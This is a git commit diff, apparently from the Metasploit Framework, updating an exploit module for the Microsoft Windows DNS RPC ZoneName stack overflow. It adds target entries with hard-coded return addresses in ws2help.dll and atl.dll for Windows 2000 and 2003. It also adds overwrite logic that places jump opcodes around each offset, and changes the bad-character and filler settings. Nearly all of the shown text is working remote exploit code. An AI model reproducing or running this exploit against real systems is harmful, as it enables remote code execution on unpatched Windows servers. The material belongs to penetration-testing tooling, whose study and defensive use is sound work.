Almost done...
git-svn-id: file:///home/svn/framework3/trunk@4683 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
66a87c8802
commit
17082dda1a
|
@ -37,12 +37,16 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
||||||
['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
|
['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
|
||||||
],
|
],
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'EXITFUNC' => 'thread'
|
||||||
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 1024,
|
'Space' => 1024,
|
||||||
|
|
||||||
# The payload doesn't matter, but make_nops() uses these too
|
# The payload doesn't matter, but make_nops() uses these too
|
||||||
'BadChars' => "\x00\x5c\x5f\x31\x32\x33\x34\x35\x36\x37",
|
'BadChars' => "\x00",
|
||||||
|
|
||||||
'StackAdjustment' => -3500,
|
'StackAdjustment' => -3500,
|
||||||
|
|
||||||
|
@ -50,12 +54,26 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
|
[ 'Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English',
|
||||||
|
{
|
||||||
|
'Addresses' => # Offsets must not overlap -4 or +9
|
||||||
|
[
|
||||||
|
[ 1213, 0x75022ac4 ], # Windows 2000 SP0-SP4 ws2help.dll
|
||||||
|
[ 1593, 0x7ffc0960 ], # Windows 2003 SP0 ??? (unreliable?)
|
||||||
|
[ 1633, 0x76a81a60 ], # Windows 2003 SP1-SP2 atl.dll
|
||||||
|
]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
|
||||||
# WS2HELP.DLL
|
# WS2HELP.DLL
|
||||||
[ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
||||||
|
|
||||||
# ATL.DLL (checked)
|
# Unknown, probably bad :(
|
||||||
[ 'Windows 2003 Server SP0 Checked/Debug English', { 'Off' => 1597, 'Ret' => 0x7669b5c5 } ],
|
[ 'Windows 2003 Server SP0 English', { 'Off' => 1593, 'Ret' => 0x7ffc0960 } ],
|
||||||
|
|
||||||
|
# ATL.DLL (no SafeSEH)
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 English', { 'Off' => 1633, 'Ret' => 0x76a81a60 } ],
|
||||||
|
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Apr 13 2007'
|
'DisclosureDate' => 'Apr 13 2007'
|
||||||
))
|
))
|
||||||
|
@ -89,13 +107,22 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
||||||
dcerpc_bind(handle)
|
dcerpc_bind(handle)
|
||||||
print_status("Bound to #{handle} ...")
|
print_status("Bound to #{handle} ...")
|
||||||
|
|
||||||
txt = Rex::Text.pattern_create(8192)
|
txt = Rex::Text.rand_text_alphanumeric(8192)
|
||||||
txt[0, payload.encoded.length] = payload.encoded
|
txt[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
off = target['Off']
|
if (target['Addresses'])
|
||||||
txt[ off ] = [target.ret].pack('V')
|
target['Addresses'].each do |ent|
|
||||||
txt[ off - 4, 2] = "\xeb\x06"
|
off, ret = ent
|
||||||
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
txt[ off ] = [ret].pack('V')
|
||||||
|
txt[ off - 4, 2] = "\xeb\x06"
|
||||||
|
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
||||||
|
end
|
||||||
|
else
|
||||||
|
off = target['Off']
|
||||||
|
txt[ off ] = [target.ret].pack('V')
|
||||||
|
txt[ off - 4, 2] = "\xeb\x06"
|
||||||
|
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
||||||
|
end
|
||||||
|
|
||||||
req = ''
|
req = ''
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue